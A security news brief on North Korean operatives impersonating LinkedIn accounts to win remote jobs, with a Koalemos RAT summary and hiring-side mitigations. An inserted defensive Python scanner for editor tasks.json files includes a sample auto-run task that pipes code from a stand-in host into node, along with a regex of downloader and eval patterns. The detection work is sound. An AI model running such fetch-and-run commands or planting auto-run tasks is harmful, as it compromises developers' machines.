North Korean IT operatives are applying to remote jobs using real LinkedIn accounts they impersonate, with fake profiles that include verified workplace emails and identity badges, a Security Alliance post said.
KEY FACTS
- Incident: DPRK operatives impersonate real LinkedIn accounts to apply for remote positions
- Tactics: Fraudulent profiles include workplace email verification and identity badges to appear legitimate
- Impact: Goals include revenue generation, espionage and possible extortion
- Mitigation: Validate candidate email control and require direct account verification on LinkedIn
The scheme is part of a long-running operation in which operatives pose as remote workers to secure jobs under stolen or fabricated identities. The activity seeks steady revenue streams, access to sensitive data and, in some cases, opportunities to demand ransoms.
Attackers use fake hiring flows that ask candidates to perform skill assessments and run commands that can execute malicious code. Techniques observed include hosting command and control elements on blockchain smart contracts and using editor task files to deliver JavaScript payloads that install malware.
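A defender-side check for the editor task file technique described above, added here as an example that is not from the Security Alliance post: it parses a VS Code-style tasks.json (an assumption, since the post does not name the editor) and reports tasks configured to run automatically when the folder is opened, flagging those whose command fetches or evaluates code. The sample file is constructed for the example.

```python
import json
import re

# Constructed sample of a .vscode/tasks.json as it might arrive in a
# "skill assessment" repository. The first task is ordinary; the last two
# auto-run on folder open, and the final one pipes remote code into node.
SAMPLE_TASKS_JSON = r'''
{
  "version": "2.0.0",
  "tasks": [
    {"label": "build", "type": "shell", "command": "npm run build"},
    {"label": "deps", "type": "shell", "command": "npm install",
     "runOptions": {"runOn": "folderOpen"}},
    {"label": "setup", "type": "shell",
     "command": "curl -s http://example.invalid/setup.js | node",
     "runOptions": {"runOn": "folderOpen"}}
  ]
}
'''

# Command fragments that should not appear in a task nobody clicked on:
# inline evaluation, downloaders, decoders, or piping into an interpreter.
SUSPICIOUS = re.compile(
    r"(node\s+-e|eval\(|child_process|curl\s|wget\s|Invoke-WebRequest"
    r"|base64\s+-d|\|\s*(sh|bash|node)\b)",
    re.IGNORECASE,
)


def find_autorun_tasks(tasks_json_text: str) -> list[dict]:
    """Return one finding per task that runs on folder open.

    Note: real tasks.json files may contain comments (JSONC); strip them or
    use a JSONC parser before calling this, as json.loads rejects them.
    """
    data = json.loads(tasks_json_text)
    findings = []
    for task in data.get("tasks", []):
        run_on = (task.get("runOptions") or {}).get("runOn")
        if run_on != "folderOpen":
            continue
        # Join command and args so a split-up invocation is still inspected.
        parts = [str(task.get("command", ""))]
        parts += [str(a) for a in task.get("args", [])]
        cmd = " ".join(parts).strip()
        findings.append({
            "label": task.get("label", "<unnamed>"),
            "command": cmd,
            "suspicious": bool(SUSPICIOUS.search(cmd)),
        })
    return findings
```

Run it over every tasks.json in a repository before opening the folder in an editor; an auto-run task that is not flagged still deserves a look, since `npm install` can itself execute package lifecycle scripts.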
A modular JavaScript remote access trojan called Koalemos has been delivered through malicious npm packages and a loader. The malware runs a beacon loop to retrieve tasks, supports filesystem operations and discovery commands, and uses DNS-based gating and engagement date checks to complicate detection.
After salaries are paid, funds are converted to cryptocurrency and laundered through chain hopping, token swaps, decentralized exchanges and bridge protocols. Defenders are advised to list official contact channels, confirm candidate email ownership and ask candidates to connect on LinkedIn to verify account control. The overall scope of impacted companies remains unclear.
WHY IT MATTERS
Organizations hiring remote technical staff risk credential theft, loss of intellectual property and unauthorized access to code and infrastructure. The activity also creates a revenue stream that can be converted to cryptocurrency and moved offshore.